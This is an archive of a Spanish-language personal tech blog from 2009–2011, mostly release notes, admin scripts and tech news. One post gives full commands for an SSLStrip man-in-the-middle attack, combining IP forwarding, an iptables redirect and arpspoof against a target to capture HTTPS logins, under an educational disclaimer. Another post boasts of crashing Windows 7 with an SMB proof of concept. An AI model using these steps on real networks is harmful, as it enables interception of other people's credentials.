jueves, 7 de abril de 2011

GaritasBC version 0.5

Pues si, despues de tanto tiempo salio la version 0.5 de GaritasBC, un Addon para Firefox con el cual pueden consultar las Garitas de Tijuana/Tecate y Mexicali desde el status bar de una forma sencilla.

Cambios en esta version:
Compatibilidad con Firefox 4.0.*
Mejor estructura y cumplimiento con normas para los Addons Firefox
El link para obtener la informacion de Mexicali ya no funcionaba, ahora si :).
(Y si, omiti los acentos Grammar Hitlers!)

Enjoy!
GaritasBC

lunes, 27 de diciembre de 2010

Help Wanted - LAMP Senior Developer

LAMP (Linux, Apache, MySQL, PHP) Senior Developer

We are looking for an experienced LAMP Developer.

* 4 to 5 years experience in PHP
* Linux
* Apache
* MySQL
* Good English Level
* US VISA (Will be traveling to California)

Please send your resume to isuraeru on gmail!

jueves, 20 de mayo de 2010

Buscar Usuarios por Grupo en Active Directory

Hace algún tiempo necesitaba un pequeño script para detectar usuarios dentro de mi grupo wireless en Active Directory, asi que me di la tarea de investigar un poco en como lograrlo, así pude crear el siguiente script el cual pueden modificarlo para ver los usuarios que pertenecen a un grupo X.

Lo que hace es crear un archivo txt para guardar los resultados (en el mismo directorio donde esta el script), verifica los usuarios de un grupo y los datos a grabar son SAM Account, Name y displayName.

On Error Resume Next

Const DOMAINGROUP = "LDAP://cn=Wireless, cn=Users, dc=midominio,dc=dom"
Const GROUPHEADER = "<-= GROUP Wireless =->"
Const GROUPFOOTER = "====================="

doYourJob

openFile

Private Sub doYourJob()
Set objGroup = GetObject _
(DOMAINGROUP)
''objGroup.GetInfo

Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.CreateTextFile("memberswifi.txt", True)

file.Writeline GROUPHEADER

For each objMember in objGroup.Members
file.Writeline "[---------------------------]"
file.Writeline objMember.SAMAccountName
file.Writeline objMember.Name
file.Writeline objMember.displayName
Next
file.Writeline GROUPFOOTER
file.Close
End Sub

Private Sub openFile()
Const WIN_STYLE = 4
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "notepad.exe c:memberswifi.txt", WIN_STYLE
End Sub


Graban este archivo con extensión vbs y listo.

Espero les sea de utilidad.

martes, 4 de mayo de 2010

iPhoneLinux / iDroid


(Logo no oficial)

En abril 21 un miembro del conocido iPhone Dev Team mostro al mundo un video donde muestra al OS Android ejecutandose en el hardware de un iPhone 2G.

Hasta el momento solo esta disponible para ese modelo y se esta trabajando para crear ports a los demas modelos.

Actualmente estoy apoyando en el alpha testing para el iPod Touch 2G.

Para mayor información pueden entrar a la pagina ofical del proyecto:

iDroid
Planetbeing blog

Saludos!

martes, 13 de abril de 2010

Gears of War 3



Si, soy fan de este juego (solo por eso tengo el Xbox 360), tengo ambos juegos que han salido de esta franquicia, me gusta el gameplay, la historia, los diseños, etc.

Ahora bien, se estuvo rumorando en Internet que el tercer capitulo de esta historia saldria el siguiente año, pero fue ayer cuando se confirmo por Cliff Bleszinski Design Director en Epic Games en el show Late Night with Jimmy Fallon que saldra en abril del 2011: Video del Show y trailer de Gears of War 3 "Ashes to Ashes".

Lo interesante en esta tercer entrega es lo siguiente:
Female Soldiers - Yeah!, para todas las chicas "gamers", ya se podran escoger mujeres.
Double Barrel Shotgun - Shotgun... mi arma favorita... ahora con doble cañon!
Gray Environment - Un ambiente aun mas apocaliptico, con cenizas por doquier.
More New Locusts - Enemigos adicionales, unos con tentaculos aka Lambent...
Y lo mejor de todo, en el Story Mode la posibilidad de co-op (cooperativo) no sera solamente de 2 personajes al mismo tiempo, si no 4 personajes!!.

NO puedo esperar a tener este juego en mi poder.

jueves, 25 de febrero de 2010

Quake III en Motorola Droid

El 22 de este mes de febrero salio la noticia de que John Carmack va a recibir el premio Lifetime Achievement por parte de Game Developers Choice Awards, esto sera el 11 de marzo, bien merecido para John ya que ha colaborado de una forma impresionante en el desarrollo de video juegos en 3D.

Bueno, gracias a sus desarrollos y que el código de algunos de sus juegos desarrollados por su compañia ID Software estan bajo licencia GPL, ha permitido que varios geeks programadores alrededor del mundo puedan modificar dicho código para crear nuevos juegos o que puedan ser ejecutados en varias plataformas.

Hoy le toco a Droid de Motorola, donde un programador porto el juego de Quake III a este dispositivo, por lo cual si eres Gamer, eres fan de Quake y tienes un Droid, ya la hiciste.

Gracias John Carmack!

[Game Development Choice Awards]

[Página de Proyecto Quake III en Droid]

miércoles, 23 de diciembre de 2009

dcsDigitiser Graph Digitizer

Pues este es el segundo articulo de este blog de la etiqueta admonhack, esta etiqueta tendra todo lo relacionado de Administración utilizando la tecnología como apoyo para la solución de problemas, manejo de proyectos, etc., en pocas palabras Tecnología en servicio de administración.

Ahora poniendo en práctica lo anterior, me encontre con un caso en el cual un cliente nos envio información en forma de gráfica líneal (esos datos los necesitabamos en forma de tabla - a la administración -o sease en hoja de calculo). Por lo cual me dispuse a buscar un software que disponga de la capacidad de interpretar valores dentro de una gráfica a valores en forma de tabla.

Navegando un rato encontre dcsDigitiser, esta herramienta es muy sencilla de utilizar, solamente cargas la gráfica, le indicas donde estan los puntos X1, X2, Y1 y Y2, los puntos de la gráfica y listo, se obtiene una tabla de valores.



[dcsDigitiser]

martes, 15 de diciembre de 2009

iPod con acceso a correo Exchange

Despues de mucho tiempo de "batallar" con la configuración de mi iPod para poder accesar al correo Exchange pude lograrlo.
La configuración de este es muy sencilla pero en mi caso tuve que realizar algunos "tweaks" en el iPod para que funcionara:

- Your exchange must have access to ports 193 (unsecured) and 993 (Secured)
- IMAP must be enabled to be used amongst the user accounts. If not it won't work either.

Esto ultimo para servidores que tienen funcionando Exchange 2003.

En su iPhone/iPod van a Settings -> Mail, Con... -> Other.
Llenan todos los campos con la información de su servidor, seleccionan IMAP y llenan los campos con la información de su servidor, en el caso de SSL la opción es NO (si, ya se, pero es interno el correo :D).

En mi caso tuve que hacer un "hack" modificando el archivo hosts para agregar la IP estatica del servidor Exchange.

Saludos!

viernes, 20 de noviembre de 2009

SuperKB 0.20

Buen día a todos,
Pues ya salio la versión 0.20 de superkb gracias a Octavio quien oficialmente me hizo "Package Maintainer" para los paquetes de Fedora.
- Aquí esta el blog de Octavio del release.
- Aquí esta la página oficial de Superkb.
- Aquí pueden bajar el source code y paquetes.

Enjoy!!

jueves, 19 de noviembre de 2009

Farmville Auto Click

Ser un Farmville Addict no es fácil, requiere de esfuerzo y dedicación para tener tu Farm en buen estado, la flojera viene cuando tienes demasiados "cuadros" de sembradios y tienes que cosechar, arar y sembrar (clicks, clicks y mas clicks).
Para eso un programador con pseudonimo Sam creo una aplicación que se llama FarmVille Auto Click (FVAClick.exe).
Esta aplicación soluciona todos los problemas antes mencionados por que le indicas cuantos "cuadros" vas a dar click y lo hace automágicamente por ti por lo cual no más sufrimiento para las tareas diarias de FarmVille.
Screenshots



[Download]
Imagenes Obtenidas de aquí
Creditos: Para el Desarrollador de la aplicación.
Enjoy!!!

Superkb - Paquetes RPM y SRPM para Fedora 12

Despues de haber instalado Fedora 12 aka Constantine me di a la tarea de crear unos paquetes RPM y SRPM para el proyecto de mi amigo Octavio Alvarez - SuperKB.
Esta aplicación es sencilla y muy útil:
Superkb es un lanzador gráfico de programas para Linux. Funciona activándose al presionar una supertecla, normalmente Super_L o Super_R (mejor conocida como "la tecla de Windows"). Al activarse, presenta en pantalla un teclado con las teclas y sus correspondientes acciones.

Por ejemplo podemos configurar la Superkey + f para ejecutar Firefox.

Screenshot - Esta muy "crappy" por que todavia tengo que modificar el archivo de configuración a mi gusto.



Receta mágica para Fedora 12
1.- Deben de tener instalados los siguientes paquetes:
libnotify-0.4.5-3.fc12.i686
imlib2-1.4.2-5.fc12.i686
libXinerama-1.1-1.fc12.i686
libX11-1.3-1.fc12.i686
libX11-common-1.3-1.fc12.i686
libXft-2.1.13-4.fc12.i686

Haciendo esto:

#yum -y install libnotify imlib2 libXinerama libX11 libX11-common libXft

2.- Despues de eso bajan el RPM de la página de downloads de Superkb (Hay que esperar a que Octavio suba los RPMs).

3.- Lo instalan:
#rpm -Uvh superkb-0.17-1.fc12.noarch.rpm

4.- En /etc/superkb tendran unos archivos de configuración, de preferencia utilicen el que dice fedora.superkbrc -
Este lo van a guardar en un archivo .superkbrc en su directorio HOME. ie. $HOME/.superkbrc
:

5.- Ejecutan desde su shell (o hacen un launcher) a superkb:

$superkb &

Listo, solo presionan (dejan presionada) la tecla Super_L (Windows Key Left) y veran las opciones, en este ejemplo si presionan Super_L+f se ejecutara Firefox.

Bueno, espero sea de ayuda.

UPDATE: Platicando con Octavio, va a liberar una nueva versión soportando Cairo, esperare esa versión para compilar de nuevo el RPM y SRPM y podamos subirlos en su sitio de SF. Se probo el RPM con un conejillo de indias y funciono sin problemas utilizando esta guia (bueno, si tiene problemas pero ya son de su configuración).

Saludos!

miércoles, 18 de noviembre de 2009

Upgrade from Fedora 11 to 12

Pues ya salio la versión 12 de Fedora AKA Constantine y no podia desaprovechar la oportunidad para actualizar mi Box.
Para realizar el Upgrade tuve que seguir los pasos de Upgrading Fedora using yum, una actualización que no necesito mucho trabajo, ya que a mi sistema lo trato de tener lo mas sano posible, solo hubo algunos paquetes que marcaron conflictos (2).
Lo que me gusto fue la advertencia:
Once a live upgrade is started do not stop the upgrade by rebooting, killing the process, or by any other method until it is complete, doing so will cause the affected system to be in a mixed state. Partially the old release and partially the new release. In this state the system will not be reliable and will not operate as expected. The only way to recover from this is to reinstall if it occurs.

O sea que si en el momento del "Live upgrade" pasaba algo con la conexion a Internet, Luz, etc. mi sistema podia quedar inoperable (yeah, Extreme Living!).
Saludos!

viernes, 13 de noviembre de 2009

Windows 7 / Server 2008R2 Remote Kernel Crash

¿Recuerdan el exploit que provocaba un BSOD en Windows 7 de Laurent Gaffié?...
Si la respuesta es sí continuen leyendo, si es no, favor de ir aquí.
Pues nuestro amigo Laurent encontró otro fallo en SMB que afecta a Windows 7/ Server 2008 R2 con severidad de medium a high.
El impacto es que un atacante puede remotamente "tronar" cualquier Windows 7/Server 2008R2 dentro de la LAN o via IE (Internet Explorer).
NO hay patch por lo que se recomienda cerrar los puertos que usen SMB.
From Laurent...
"Most secure Os ever";
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.

[Blog de Laurent]

UPDATE: It works!, el PoC lo tienen que modificar un poco, una pizca de Ingenieria Social y listo!, la Windows Machine se Freezea!!! (Pwn3d!):

jueves, 12 de noviembre de 2009

¿Microsoft Patenta Sudo?



DAMN!
Así empezamos es post, no soy "Microsoft hater" como algunas personas que usan Linux, yo uso ambos sistemas a diario, claro que tienen sus pros y sus contras pero al fin alcabo hacen lo que deben hacer.

Como el titulo de este post lo dice "¿Microsoft patenta sudo?", esta noticia la vi en Groklaw en donde describe una patente de Microsoft con numero 7,617,530 ingresada el 10 de noviembre de 2009 en la cual hace referencia a:

Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface identifying an account having a right to permit a task in response to the task being prohibited based on a user's current account not having that right.

Sistemas y/o metodos que permiten a un usuario elevar sus permisos.


O sea, NO ma#$%s...

Esta claro que estan describiendo a sudo y/o su, esto me hizo pensar en varias cuestiones, como lo mencione antes, no soy "Microsoft hater", pero en esta ocasión si se paso de ....

1.- ¿Le habra hecho daño a la comunidad que Microsoft se casara con Novell?
2.- ¿Microsoft esta "pirateandose" habilidades de GNU/Linux gracias a este "deal"?
- Will the REAL "NEW" in Windows 7 please stand up - TechRepublic
3.- ¿Seguira Microsoft ingresando patentes de sus "nuevos inventos" que saca de la comunidad de Software Libre y UNIX?
4.- ¿Algun día cobraran por x razón por aplicaciones hechas con MONO (uso, patentes, etc.)?
- Mono Tools for Visual Studio - By Icaza

Estas son algunas cuestiones que me he puesto a pensar, no tengo nada con la interoperabilidad de OSes, pero gandallearte con una patente creo que no es justo.

Let the Flame wars begin...

[GrokLaw Article]
Image by - xkcd

jueves, 5 de noviembre de 2009

Graudit

Graudit es un script simple que te permite encontrar importantes fallas de seguridad en tu código.

Soporta escanear código de asp, jsp, perl, php y python.

Programmers denle una revisada.

[Sitio de Graudit]

martes, 27 de octubre de 2009

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Yeah!, un ejemplo básico es que puedes ver el username y password de una página de bancos como CapitolOne :S.

Las instrucciones siguientes seran para Fedora, ya que en la página oficial vienen para Debian based:

Python >= 2.4
yum -y install python

Python "twisted-web"
yum -y install python-twisted-web

Arpspoof
yum -y install dsniff

Setup
tar zxvf sslstrip-0.X.tar.gz
cd sslstrip-0.X
(optional) ./setup.py install


Forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward

Configuramos iptables para dirigir el tráfico HTTP a sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [listenPort]

Ejecutamos sslstrip.
sslstrip.py -l [listenPort]

Ejecutamos arpspoof para que el tráfico sea enviado hacia nuestro equipo.
arpspoof -i [interface] -t [targetIP] [gatewayIP]

Listo, pueden abrir el archivo sslstrip.log para ver las capturas de trafico HTTPS.

Disclaimer: Este post es de cuestiones didacticas para conocer como un atacante puede aprovecharse de un acceso no autorizado a nuestra red y ver el tráfico que va destinado a HTTPS.

[Sitio de SSLStrip]

jueves, 22 de octubre de 2009

Members in Active Directory Group

Me vi en la necesidad de obtener una lista de usuarios de un grupo en AD en Win2003 Svr pero al quererlo hacer por medio de las herramientas administrativas no me daba el resultado deseado e inverti más tiempo de lo normal.

¿Qué fue lo que hice?

Tuve que recurrir al Command Prompt (Modo texto nunca se "raja").
Indagando un poco pude crear un pseudo vbs script:

On Error Resume Next

Const DOMAINGROUP = "LDAP://cn=grupo, cn=Users, dc=midominio,dc=com"
Const GROUPHEADER = "<-= GROUP grupo =->"
Const GROUPFOOTER = "====================="

doYourJob

openFile

Private Sub doYourJob()
Set objGroup = GetObject _
(DOMAINGROUP)
''objGroup.GetInfo

Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.CreateTextFile("members.txt", True)

file.Writeline GROUPHEADER

For each objMember in objGroup.Members
file.Writeline objMember.Name
Next
file.Writeline GROUPFOOTER
file.Close
End Sub

Private Sub openFile()
Const WIN_STYLE = 4
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "notepad.exe c:members.txt", WIN_STYLE
End Sub


Solo hay que hacer copy-paste y grabarlo con extensión vbs.

Saludos!

miércoles, 21 de octubre de 2009

America + Chivas = 3D

Si, primera vez en la historia de la humanidad tecnologica se transmitira un partido en vivo en 3D! y los equipos a disputar dicho partido son nada mas y nada menos que las Aguilas del America y las Chivas del Guadalajara, Super Clasico, si, de nuevo, en 3D!!!!!
[Nota Periodistica]

Rapid7 adquiere Metasploit

Metasploit es el framework libre reconocido mundialmente para ejecutar exploits (hack da stuff!) que ha estado alrededor de 6 años en el ambito de la seguridad de tecnologias de información.

Este desarrollo que era solo de fin de semana o tiempo libre por parte de HD Moore y Egipt ahora sera de tiempo completo, pagado por Rapid7.

En horabuena, esperemos que Rapid7 sepa aprovechar el talento del equipo detras de Metasploit y este framework pueda crecer.

Anuncio Metasploit
Anuncio Rapid7

martes, 20 de octubre de 2009

Prey - Recupera tu Laptop

Como esta escrito en el Sitio de la aplicación:

Prey es un pequeño programa que te ayudará a encontrar tu PC si algún día te lo roban.


Lo mejor de todo es que funciona en Windows/MacOs/Linux, es Open Source y Gratuito!

Prey puede darles esa esperanza de recuperar su laptop en caso de ser robada.

[Prey]